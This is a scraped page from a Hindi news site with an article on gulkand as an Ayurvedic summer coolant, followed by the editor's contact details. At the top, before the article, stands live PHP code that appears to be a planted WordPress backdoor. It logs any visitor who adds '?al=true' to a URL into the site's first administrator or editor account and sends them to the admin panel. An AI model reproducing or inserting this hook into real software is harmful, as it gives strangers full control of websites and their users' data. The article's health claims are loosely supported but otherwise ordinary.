// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); भयंकर गर्मी और लू से बचाएगा आयुर्वेद का यह प्राकृतिक कूलेंट गुलकंद – प्रत्युषा आशा की नयी किरण
मनोरंजन

भयंकर गर्मी और लू से बचाएगा आयुर्वेद का यह प्राकृतिक कूलेंट गुलकंद

गर्मियों के तपते मौसम में गुलकंद शरीर के लिए किसी वरदान से कम नहीं है. आयुर्वेद में इसे प्राकृतिक कूलेंट माना गया है जो शरीर को अंदरूनी ठंडक पहुंचाने में काफी मददगार होता है. ताजी गुलाब की पंखुड़ियों और मिश्री के से तैयार होने वाला गुलकंद स्वाद में लाजवाब होता है. इसके साथ ही गर्मी में गुलकंद का सेवन आपको भीषण गर्मी में ठंडक देने, सुस्ती दूर करने, एनर्जी देने और पेट की समस्याओं को दूर करने में मदद करता है.

गुलकंद खाने के बेमिसाल फायदे

गुलाब त्वचा के लिए बहुत अच्छा होता है क्योंकि यह त्वचा को गहराई से हाइड्रेट करता है, सूजन कम करता है और तेल के उत्पादन को संतुलित करता है. इसमें विटामिन A और C भरपूर मात्रा में होते हैं जो कोलेजन के उत्पादन को बढ़ावा देते हैं और उम्र बढ़ने के लक्षणों जैसे कि झुर्रियों और फाइन लाइंस से लड़ने में मदद करते हैं.अगर आप रोजाना घर का बना गुलकंद खाते हैं तो आपको चिलचिलाती धूप और लू के थपेड़ों में अपनी बॉडी को कूल रखने में मदद मिलेगी.

शरीर को देता है ठंडक
 गुलकंद गुलाब की पत्तियों से मिलकर बनता है इसलिए इसमें कूलिंग प्रॉपर्टीज पाई जाती हैं जिससे आपको गर्मी में राहत मिलती है. गुलाब के पंखुड़ियों में ठंडक देने वाले गुण होते हैं जो गर्मियों में शरीर के तापमान को नियंत्रित करने और गर्मी के कारण होने वाली समस्याओं जैसे लू और डिहाइड्रेशन को कम करने में मदद करते हैं. यह मानसिक तनाव को कम करने और मूड को सुधारने में भी मददगार है.

तनाव और थकान कम करे
 इसकी भीनी खुशबू और औषधीय गुण दिमाग को शांत करते हैं और थकान दूर कर बेहतर नींद लाने में मदद करते हैं.

पाचन के लिए भी असरदार
 गुलकंद में प्राकृतिक लैक्सेटिव गुण होते हैं, जो पाचन को विनियमित करने और कब्ज को रोकने में मदद करते हैं. यह पेट को ठंडा रखने और पेट की अन्य समस्याओं जैसे कि एसिडिटी और जलन को कम करने में भी सहायक है.

स्किन के लिए है बेहतरीन
गुलकंद में एंटीऑक्सिडेंट गुण होते हैं जो त्वचा को नुकसान से बचाने और त्वचा के स्वास्थ्य को बेहतर बनाने में मदद करते हैं. यह त्वचा को चमकदार और टाइट बनाए रखने में भी मददगार होता है.

गुलकंद देता है एनर्जी  गुलकंद में प्राकृतिक शुगर होती है जो ऊर्जा के स्तर को बढ़ाने में मदद करती है. यह थकान को कम करने में मददगार है.

गुलकंद खाने से पहले बरतें ये सावधानी
गुलकंद का सेवन सीमित मात्रा में करें. अगर आपको डायबिटीज है तो गुलकंद का सेवन करने से पहले अपने डॉक्टर से सलाह लें. अगर आपको गुलाब की पंखुड़ियों से एलर्जी है तो गुलकंद का सेवन न करें.

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड